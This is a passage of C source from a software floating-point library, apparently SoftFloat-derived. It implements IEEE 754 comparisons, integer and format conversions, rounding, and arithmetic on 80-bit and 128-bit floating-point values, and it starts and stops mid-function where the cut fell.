|| (extractFloatx80Exp(a) == 0x7FFF && (uint64_t) (extractFloatx80Frac(a) << 1)) || (extractFloatx80Exp(b) == 0x7FFF && (uint64_t) (extractFloatx80Frac(b) << 1)) ) { float_raise(float_flag_invalid, status); return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is | equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not | cause an exception. The comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int floatx80_eq_quiet(floatx80 a, floatx80 b, float_status *status) { if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return 0; } if ( ( ( extractFloatx80Exp( a ) == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) || ( ( extractFloatx80Exp( b ) == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( b )<<1 ) ) ) { if (floatx80_is_signaling_nan(a, status) || floatx80_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } return ( a.low == b.low ) && ( ( a.high == b.high ) || ( ( a.low == 0 ) && ( (uint16_t) ( ( a.high | b.high )<<1 ) == 0 ) ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is less | than or equal to the corresponding value `b', and 0 otherwise. Quiet NaNs | do not cause an exception. Otherwise, the comparison is performed according | to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int floatx80_le_quiet(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return 0; } if ( ( ( extractFloatx80Exp( a ) == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) || ( ( extractFloatx80Exp( b ) == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( b )<<1 ) ) ) { if (floatx80_is_signaling_nan(a, status) || floatx80_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloatx80Sign( a ); bSign = extractFloatx80Sign( b ); if ( aSign != bSign ) { return aSign || ( ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) == 0 ); } return aSign ? le128( b.high, b.low, a.high, a.low ) : le128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is less | than the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause | an exception. Otherwise, the comparison is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int floatx80_lt_quiet(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return 0; } if ( ( ( extractFloatx80Exp( a ) == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) || ( ( extractFloatx80Exp( b ) == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( b )<<1 ) ) ) { if (floatx80_is_signaling_nan(a, status) || floatx80_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloatx80Sign( a ); bSign = extractFloatx80Sign( b ); if ( aSign != bSign ) { return aSign && ( ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) != 0 ); } return aSign ? lt128( b.high, b.low, a.high, a.low ) : lt128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point values `a' and `b' | cannot be compared, and 0 otherwise. Quiet NaNs do not cause an exception. | The comparison is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int floatx80_unordered_quiet(floatx80 a, floatx80 b, float_status *status) { if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return 1; } if ( ( ( extractFloatx80Exp( a ) == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) || ( ( extractFloatx80Exp( b ) == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( b )<<1 ) ) ) { if (floatx80_is_signaling_nan(a, status) || floatx80_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point | value `a' to the 32-bit two's complement integer format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic---which means in particular that the conversion is rounded | according to the current rounding mode. If `a' is a NaN, the largest | positive integer is returned. Otherwise, if the conversion overflows, the | largest integer with the same sign as `a' is returned. *----------------------------------------------------------------------------*/ int32_t float128_to_int32(float128 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig0, aSig1; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( ( aExp == 0x7FFF ) && ( aSig0 | aSig1 ) ) aSign = 0; if ( aExp ) aSig0 |= UINT64_C(0x0001000000000000); aSig0 |= ( aSig1 != 0 ); shiftCount = 0x4028 - aExp; if ( 0 < shiftCount ) shift64RightJamming( aSig0, shiftCount, &aSig0 ); return roundAndPackInt32(aSign, aSig0, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point | value `a' to the 32-bit two's complement integer format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic, except that the conversion is always rounded toward zero. If | `a' is a NaN, the largest positive integer is returned. Otherwise, if the | conversion overflows, the largest integer with the same sign as `a' is | returned. *----------------------------------------------------------------------------*/ int32_t float128_to_int32_round_to_zero(float128 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig0, aSig1, savedASig; int32_t z; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); aSig0 |= ( aSig1 != 0 ); if ( 0x401E < aExp ) { if ( ( aExp == 0x7FFF ) && aSig0 ) aSign = 0; goto invalid; } else if ( aExp < 0x3FFF ) { if (aExp || aSig0) { status->float_exception_flags |= float_flag_inexact; } return 0; } aSig0 |= UINT64_C(0x0001000000000000); shiftCount = 0x402F - aExp; savedASig = aSig0; aSig0 >>= shiftCount; z = aSig0; if ( aSign ) z = - z; if ( ( z < 0 ) ^ aSign ) { invalid: float_raise(float_flag_invalid, status); return aSign ? INT32_MIN : INT32_MAX; } if ( ( aSig0<<shiftCount ) != savedASig ) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point | value `a' to the 64-bit two's complement integer format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic---which means in particular that the conversion is rounded | according to the current rounding mode. If `a' is a NaN, the largest | positive integer is returned. Otherwise, if the conversion overflows, the | largest integer with the same sign as `a' is returned. *----------------------------------------------------------------------------*/ int64_t float128_to_int64(float128 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig0, aSig1; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( aExp ) aSig0 |= UINT64_C(0x0001000000000000); shiftCount = 0x402F - aExp; if ( shiftCount <= 0 ) { if ( 0x403E < aExp ) { float_raise(float_flag_invalid, status); if ( ! aSign || ( ( aExp == 0x7FFF ) && ( aSig1 || ( aSig0 != UINT64_C(0x0001000000000000) ) ) ) ) { return INT64_MAX; } return INT64_MIN; } shortShift128Left( aSig0, aSig1, - shiftCount, &aSig0, &aSig1 ); } else { shift64ExtraRightJamming( aSig0, aSig1, shiftCount, &aSig0, &aSig1 ); } return roundAndPackInt64(aSign, aSig0, aSig1, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point | value `a' to the 64-bit two's complement integer format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic, except that the conversion is always rounded toward zero. | If `a' is a NaN, the largest positive integer is returned. Otherwise, if | the conversion overflows, the largest integer with the same sign as `a' is | returned. *----------------------------------------------------------------------------*/ int64_t float128_to_int64_round_to_zero(float128 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig0, aSig1; int64_t z; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( aExp ) aSig0 |= UINT64_C(0x0001000000000000); shiftCount = aExp - 0x402F; if ( 0 < shiftCount ) { if ( 0x403E <= aExp ) { aSig0 &= UINT64_C(0x0000FFFFFFFFFFFF); if ( ( a.high == UINT64_C(0xC03E000000000000) ) && ( aSig1 < UINT64_C(0x0002000000000000) ) ) { if (aSig1) { status->float_exception_flags |= float_flag_inexact; } } else { float_raise(float_flag_invalid, status); if ( ! aSign || ( ( aExp == 0x7FFF ) && ( aSig0 | aSig1 ) ) ) { return INT64_MAX; } } return INT64_MIN; } z = ( aSig0<<shiftCount ) | ( aSig1>>( ( - shiftCount ) & 63 ) ); if ( (uint64_t) ( aSig1<<shiftCount ) ) { status->float_exception_flags |= float_flag_inexact; } } else { if ( aExp < 0x3FFF ) { if ( aExp | aSig0 | aSig1 ) { status->float_exception_flags |= float_flag_inexact; } return 0; } z = aSig0>>( - shiftCount ); if ( aSig1 || ( shiftCount && (uint64_t) ( aSig0<<( shiftCount & 63 ) ) ) ) { status->float_exception_flags |= float_flag_inexact; } } if ( aSign ) z = - z; return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point value | `a' to the 64-bit unsigned integer format. The conversion is | performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic---which means in particular that the conversion is rounded | according to the current rounding mode. If `a' is a NaN, the largest | positive integer is returned. If the conversion overflows, the | largest unsigned integer is returned. If 'a' is negative, the value is | rounded and zero is returned; negative values that do not round to zero | will raise the inexact exception. *----------------------------------------------------------------------------*/ uint64_t float128_to_uint64(float128 a, float_status *status) { flag aSign; int aExp; int shiftCount; uint64_t aSig0, aSig1; aSig0 = extractFloat128Frac0(a); aSig1 = extractFloat128Frac1(a); aExp = extractFloat128Exp(a); aSign = extractFloat128Sign(a); if (aSign && (aExp > 0x3FFE)) { float_raise(float_flag_invalid, status); if (float128_is_any_nan(a)) { return UINT64_MAX; } else { return 0; } } if (aExp) { aSig0 |= UINT64_C(0x0001000000000000); } shiftCount = 0x402F - aExp; if (shiftCount <= 0) { if (0x403E < aExp) { float_raise(float_flag_invalid, status); return UINT64_MAX; } shortShift128Left(aSig0, aSig1, -shiftCount, &aSig0, &aSig1); } else { shift64ExtraRightJamming(aSig0, aSig1, shiftCount, &aSig0, &aSig1); } return roundAndPackUint64(aSign, aSig0, aSig1, status); } uint64_t float128_to_uint64_round_to_zero(float128 a, float_status *status) { uint64_t v; signed char current_rounding_mode = status->float_rounding_mode; set_float_rounding_mode(float_round_to_zero, status); v = float128_to_uint64(a, status); set_float_rounding_mode(current_rounding_mode, status); return v; } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point | value `a' to the 32-bit unsigned integer format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic except that the conversion is always rounded toward zero. | If `a' is a NaN, the largest positive integer is returned. Otherwise, | if the conversion overflows, the largest unsigned integer is returned. | If 'a' is negative, the value is rounded and zero is returned; negative | values that do not round to zero will raise the inexact exception. *----------------------------------------------------------------------------*/ uint32_t float128_to_uint32_round_to_zero(float128 a, float_status *status) { uint64_t v; uint32_t res; int old_exc_flags = get_float_exception_flags(status); v = float128_to_uint64_round_to_zero(a, status); if (v > 0xffffffff) { res = 0xffffffff; } else { return v; } set_float_exception_flags(old_exc_flags, status); float_raise(float_flag_invalid, status); return res; } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point value | `a' to the 32-bit unsigned integer format. The conversion is | performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic---which means in particular that the conversion is rounded | according to the current rounding mode. If `a' is a NaN, the largest | positive integer is returned. If the conversion overflows, the | largest unsigned integer is returned. If 'a' is negative, the value is | rounded and zero is returned; negative values that do not round to zero | will raise the inexact exception. *----------------------------------------------------------------------------*/ uint32_t float128_to_uint32(float128 a, float_status *status) { uint64_t v; uint32_t res; int old_exc_flags = get_float_exception_flags(status); v = float128_to_uint64(a, status); if (v > 0xffffffff) { res = 0xffffffff; } else { return v; } set_float_exception_flags(old_exc_flags, status); float_raise(float_flag_invalid, status); return res; } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point | value `a' to the single-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ float32 float128_to_float32(float128 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig0, aSig1; uint32_t zSig; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( aExp == 0x7FFF ) { if ( aSig0 | aSig1 ) { return commonNaNToFloat32(float128ToCommonNaN(a, status), status); } return packFloat32( aSign, 0xFF, 0 ); } aSig0 |= ( aSig1 != 0 ); shift64RightJamming( aSig0, 18, &aSig0 ); zSig = aSig0; if ( aExp || zSig ) { zSig |= 0x40000000; aExp -= 0x3F81; } return roundAndPackFloat32(aSign, aExp, zSig, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point | value `a' to the double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ float64 float128_to_float64(float128 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig0, aSig1; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( aExp == 0x7FFF ) { if ( aSig0 | aSig1 ) { return commonNaNToFloat64(float128ToCommonNaN(a, status), status); } return packFloat64( aSign, 0x7FF, 0 ); } shortShift128Left( aSig0, aSig1, 14, &aSig0, &aSig1 ); aSig0 |= ( aSig1 != 0 ); if ( aExp || aSig0 ) { aSig0 |= UINT64_C(0x4000000000000000); aExp -= 0x3C01; } return roundAndPackFloat64(aSign, aExp, aSig0, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point | value `a' to the extended double-precision floating-point format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 float128_to_floatx80(float128 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig0, aSig1; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( aExp == 0x7FFF ) { if ( aSig0 | aSig1 ) { return commonNaNToFloatx80(float128ToCommonNaN(a, status), status); } return packFloatx80(aSign, floatx80_infinity_high, floatx80_infinity_low); } if ( aExp == 0 ) { if ( ( aSig0 | aSig1 ) == 0 ) return packFloatx80( aSign, 0, 0 ); normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); } else { aSig0 |= UINT64_C(0x0001000000000000); } shortShift128Left( aSig0, aSig1, 15, &aSig0, &aSig1 ); return roundAndPackFloatx80(80, aSign, aExp, aSig0, aSig1, status); } /*---------------------------------------------------------------------------- | Rounds the quadruple-precision floating-point value `a' to an integer, and | returns the result as a quadruple-precision floating-point value. The | operation is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 float128_round_to_int(float128 a, float_status *status) { flag aSign; int32_t aExp; uint64_t lastBitMask, roundBitsMask; float128 z; aExp = extractFloat128Exp( a ); if ( 0x402F <= aExp ) { if ( 0x406F <= aExp ) { if ( ( aExp == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) { return propagateFloat128NaN(a, a, status); } return a; } lastBitMask = 1; lastBitMask = ( lastBitMask<<( 0x406E - aExp ) )<<1; roundBitsMask = lastBitMask - 1; z = a; switch (status->float_rounding_mode) { case float_round_nearest_even: if ( lastBitMask ) { add128( z.high, z.low, 0, lastBitMask>>1, &z.high, &z.low ); if ( ( z.low & roundBitsMask ) == 0 ) z.low &= ~ lastBitMask; } else { if ( (int64_t) z.low < 0 ) { ++z.high; if ( (uint64_t) ( z.low<<1 ) == 0 ) z.high &= ~1; } } break; case float_round_ties_away: if (lastBitMask) { add128(z.high, z.low, 0, lastBitMask >> 1, &z.high, &z.low); } else { if ((int64_t) z.low < 0) { ++z.high; } } break; case float_round_to_zero: break; case float_round_up: if (!extractFloat128Sign(z)) { add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low); } break; case float_round_down: if (extractFloat128Sign(z)) { add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low); } break; case float_round_to_odd: /* * Note that if lastBitMask == 0, the last bit is the lsb * of high, and roundBitsMask == -1. */ if ((lastBitMask ? z.low & lastBitMask : z.high & 1) == 0) { add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low); } break; default: abort(); } z.low &= ~ roundBitsMask; } else { if ( aExp < 0x3FFF ) { if ( ( ( (uint64_t) ( a.high<<1 ) ) | a.low ) == 0 ) return a; status->float_exception_flags |= float_flag_inexact; aSign = extractFloat128Sign( a ); switch (status->float_rounding_mode) { case float_round_nearest_even: if ( ( aExp == 0x3FFE ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) { return packFloat128( aSign, 0x3FFF, 0, 0 ); } break; case float_round_ties_away: if (aExp == 0x3FFE) { return packFloat128(aSign, 0x3FFF, 0, 0); } break; case float_round_down: return aSign ? packFloat128( 1, 0x3FFF, 0, 0 ) : packFloat128( 0, 0, 0, 0 ); case float_round_up: return aSign ? packFloat128( 1, 0, 0, 0 ) : packFloat128( 0, 0x3FFF, 0, 0 ); case float_round_to_odd: return packFloat128(aSign, 0x3FFF, 0, 0); } return packFloat128( aSign, 0, 0, 0 ); } lastBitMask = 1; lastBitMask <<= 0x402F - aExp; roundBitsMask = lastBitMask - 1; z.low = 0; z.high = a.high; switch (status->float_rounding_mode) { case float_round_nearest_even: z.high += lastBitMask>>1; if ( ( ( z.high & roundBitsMask ) | a.low ) == 0 ) { z.high &= ~ lastBitMask; } break; case float_round_ties_away: z.high += lastBitMask>>1; break; case float_round_to_zero: break; case float_round_up: if (!extractFloat128Sign(z)) { z.high |= ( a.low != 0 ); z.high += roundBitsMask; } break; case float_round_down: if (extractFloat128Sign(z)) { z.high |= (a.low != 0); z.high += roundBitsMask; } break; case float_round_to_odd: if ((z.high & lastBitMask) == 0) { z.high |= (a.low != 0); z.high += roundBitsMask; } break; default: abort(); } z.high &= ~ roundBitsMask; } if ( ( z.low != a.low ) || ( z.high != a.high ) ) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Returns the result of adding the absolute values of the quadruple-precision | floating-point values `a' and `b'. If `zSign' is 1, the sum is negated | before being returned. `zSign' is ignored if the result is a NaN. | The addition is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static float128 addFloat128Sigs(float128 a, float128 b, flag zSign, float_status *status) { int32_t aExp, bExp, zExp; uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2; int32_t expDiff; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); bSig1 = extractFloat128Frac1( b ); bSig0 = extractFloat128Frac0( b ); bExp = extractFloat128Exp( b ); expDiff = aExp - bExp; if ( 0 < expDiff ) { if ( aExp == 0x7FFF ) { if (aSig0 | aSig1) { return propagateFloat128NaN(a, b, status); } return a; } if ( bExp == 0 ) { --expDiff; } else { bSig0 |= UINT64_C(0x0001000000000000); } shift128ExtraRightJamming( bSig0, bSig1, 0, expDiff, &bSig0, &bSig1, &zSig2 ); zExp = aExp; } else if ( expDiff < 0 ) { if ( bExp == 0x7FFF ) { if (bSig0 | bSig1) { return propagateFloat128NaN(a, b, status); } return packFloat128( zSign, 0x7FFF, 0, 0 ); } if ( aExp == 0 ) { ++expDiff; } else { aSig0 |= UINT64_C(0x0001000000000000); } shift128ExtraRightJamming( aSig0, aSig1, 0, - expDiff, &aSig0, &aSig1, &zSig2 ); zExp = bExp; } else { if ( aExp == 0x7FFF ) { if ( aSig0 | aSig1 | bSig0 | bSig1 ) { return propagateFloat128NaN(a, b, status); } return a; } add128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 ); if ( aExp == 0 ) { if (status->flush_to_zero) { if (zSig0 | zSig1) { float_raise(float_flag_output_denormal, status); } return packFloat128(zSign, 0, 0, 0); } return packFloat128( zSign, 0, zSig0, zSig1 ); } zSig2 = 0; zSig0 |= UINT64_C(0x0002000000000000); zExp = aExp; goto shiftRight1; } aSig0 |= UINT64_C(0x0001000000000000); add128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 ); --zExp; if ( zSig0 < UINT64_C(0x0002000000000000) ) goto roundAndPack; ++zExp; shiftRight1: shift128ExtraRightJamming( zSig0, zSig1, zSig2, 1, &zSig0, &zSig1, &zSig2 ); roundAndPack: return roundAndPackFloat128(zSign, zExp, zSig0, zSig1, zSig2, status); } /*---------------------------------------------------------------------------- | Returns the result of subtracting the absolute values of the quadruple- | precision floating-point values `a' and `b'. If `zSign' is 1, the | difference is negated before being returned. `zSign' is ignored if the | result is a NaN. The subtraction is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static float128 subFloat128Sigs(float128 a, float128 b, flag zSign, float_status *status) { int32_t aExp, bExp, zExp; uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1; int32_t expDiff; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); bSig1 = extractFloat128Frac1( b ); bSig0 = extractFloat128Frac0( b ); bExp = extractFloat128Exp( b ); expDiff = aExp - bExp; shortShift128Left( aSig0, aSig1, 14, &aSig0, &aSig1 ); shortShift128Left( bSig0, bSig1, 14, &bSig0, &bSig1 ); if ( 0 < expDiff ) goto aExpBigger; if ( expDiff < 0 ) goto bExpBigger; if ( aExp == 0x7FFF ) { if ( aSig0 | aSig1 | bSig0 | bSig1 ) { return propagateFloat128NaN(a, b, status); } float_raise(float_flag_invalid, status); return float128_default_nan(status); } if ( aExp == 0 ) { aExp = 1; bExp = 1; } if ( bSig0 < aSig0 ) goto aBigger; if ( aSig0 < bSig0 ) goto bBigger; if ( bSig1 < aSig1 ) goto aBigger; if ( aSig1 < bSig1 ) goto bBigger; return packFloat128(status->float_rounding_mode == float_round_down, 0, 0, 0); bExpBigger: if ( bExp == 0x7FFF ) { if (bSig0 | bSig1) { return propagateFloat128NaN(a, b, status); } return packFloat128( zSign ^ 1, 0x7FFF, 0, 0 ); } if ( aExp == 0 ) { ++expDiff; } else { aSig0 |= UINT64_C(0x4000000000000000); } shift128RightJamming( aSig0, aSig1, - expDiff, &aSig0, &aSig1 ); bSig0 |= UINT64_C(0x4000000000000000); bBigger: sub128( bSig0, bSig1, aSig0, aSig1, &zSig0, &zSig1 ); zExp = bExp; zSign ^= 1; goto normalizeRoundAndPack; aExpBigger: if ( aExp == 0x7FFF ) { if (aSig0 | aSig1) { return propagateFloat128NaN(a, b, status); } return a; } if ( bExp == 0 ) { --expDiff; } else { bSig0 |= UINT64_C(0x4000000000000000); } shift128RightJamming( bSig0, bSig1, expDiff, &bSig0, &bSig1 ); aSig0 |= UINT64_C(0x4000000000000000); aBigger: sub128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 ); zExp = aExp; normalizeRoundAndPack: --zExp; return normalizeRoundAndPackFloat128(zSign, zExp - 14, zSig0, zSig1, status); } /*---------------------------------------------------------------------------- | Returns the result of adding the quadruple-precision floating-point values | `a' and `b'. The operation is performed according to the IEC/IEEE Standard | for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 float128_add(float128 a, float128 b, float_status *status) { flag aSign, bSign; aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign == bSign ) { return addFloat128Sigs(a, b, aSign, status); } else { return subFloat128Sigs(a, b, aSign, status); } } /*---------------------------------------------------------------------------- | Returns the result of subtracting the quadruple-precision floating-point | values `a' and `b'. The operation is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 float128_sub(float128 a, float128 b, float_status *status) { flag aSign, bSign; aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign == bSign ) { return subFloat128Sigs(a, b, aSign, status); } else { return addFloat128Sigs(a, b, aSign, status); } } /*---------------------------------------------------------------------------- | Returns the result of multiplying the quadruple-precision floating-point | values `a' and `b'. The operation is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 float128_mul(float128 a, float128 b, float_status *status) { flag aSign, bSign, zSign; int32_t aExp, bExp, zExp; uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2, zSig3; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); bSig1 = extractFloat128Frac1( b ); bSig0 = extractFloat128Frac0( b ); bExp = extractFloat128Exp( b ); bSign = extractFloat128Sign( b ); zSign = aSign ^ bSign; if ( aExp == 0x7FFF ) { if ( ( aSig0 | aSig1 ) || ( ( bExp == 0x7FFF ) && ( bSig0 | bSig1 ) ) ) { return propagateFloat128NaN(a, b, status); } if ( ( bExp | bSig0 | bSig1 ) == 0 ) goto invalid; return packFloat128( zSign, 0x7FFF, 0, 0 ); } if ( bExp == 0x7FFF ) { if (bSig0 | bSig1) { return propagateFloat128NaN(a, b, status); } if ( ( aExp | aSig0 | aSig1 ) == 0 ) { invalid: float_raise(float_flag_invalid, status); return float128_default_nan(status); } return packFloat128( zSign, 0x7FFF, 0, 0 ); } if ( aExp == 0 ) { if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); } if ( bExp == 0 ) { if ( ( bSig0 | bSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); } zExp = aExp + bExp - 0x4000; aSig0 |= UINT64_C(0x0001000000000000); shortShift128Left( bSig0, bSig1, 16, &bSig0, &bSig1 ); mul128To256( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1, &zSig2, &zSig3 ); add128( zSig0, zSig1, aSig0, aSig1, &zSig0, &zSig1 ); zSig2 |= ( zSig3 != 0 ); if (UINT64_C( 0x0002000000000000) <= zSig0 ) { shift128ExtraRightJamming( zSig0, zSig1, zSig2, 1, &zSig0, &zSig1, &zSig2 ); ++zExp; } return roundAndPackFloat128(zSign, zExp, zSig0, zSig1, zSig2, status); } /*---------------------------------------------------------------------------- | Returns the result of dividing the quadruple-precision floating-point value | `a' by the corresponding value `b'. The operation is performed according to | the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 float128_div(float128 a, float128 b, float_status *status) { flag aSign, bSign, zSign; int32_t aExp, bExp, zExp; uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2; uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); bSig1 = extractFloat128Frac1( b ); bSig0 = extractFloat128Frac0( b ); bExp = extractFloat128Exp( b ); bSign = extractFloat128Sign( b ); zSign = aSign ^ bSign; if ( aExp == 0x7FFF ) { if (aSig0 | aSig1) { return propagateFloat128NaN(a, b, status); } if ( bExp == 0x7FFF ) { if (bSig0 | bSig1) { return propagateFloat128NaN(a, b, status); } goto invalid; } return packFloat128( zSign, 0x7FFF, 0, 0 ); } if ( bExp == 0x7FFF ) { if (bSig0 | bSig1) { return propagateFloat128NaN(a, b, status); } return packFloat128( zSign, 0, 0, 0 ); } if ( bExp == 0 ) { if ( ( bSig0 | bSig1 ) == 0 ) { if ( ( aExp | aSig0 | aSig1 ) == 0 ) { invalid: float_raise(float_flag_invalid, status); return float128_default_nan(status); } float_raise(float_flag_divbyzero, status); return packFloat128( zSign, 0x7FFF, 0, 0 ); } normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); } if ( aExp == 0 ) { if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); } zExp = aExp - bExp + 0x3FFD; shortShift128Left( aSig0 | UINT64_C(0x0001000000000000), aSig1, 15, &aSig0, &aSig1 ); shortShift128Left( bSig0 | UINT64_C(0x0001000000000000), bSig1, 15, &bSig0, &bSig1 ); if ( le128( bSig0, bSig1, aSig0, aSig1 ) ) { shift128Right( aSig0, aSig1, 1, &aSig0, &aSig1 ); ++zExp; } zSig0 = estimateDiv128To64( aSig0, aSig1, bSig0 ); mul128By64To192( bSig0, bSig1, zSig0, &term0, &term1, &term2 ); sub192( aSig0, aSig1, 0, term0, term1, term2, &rem0, 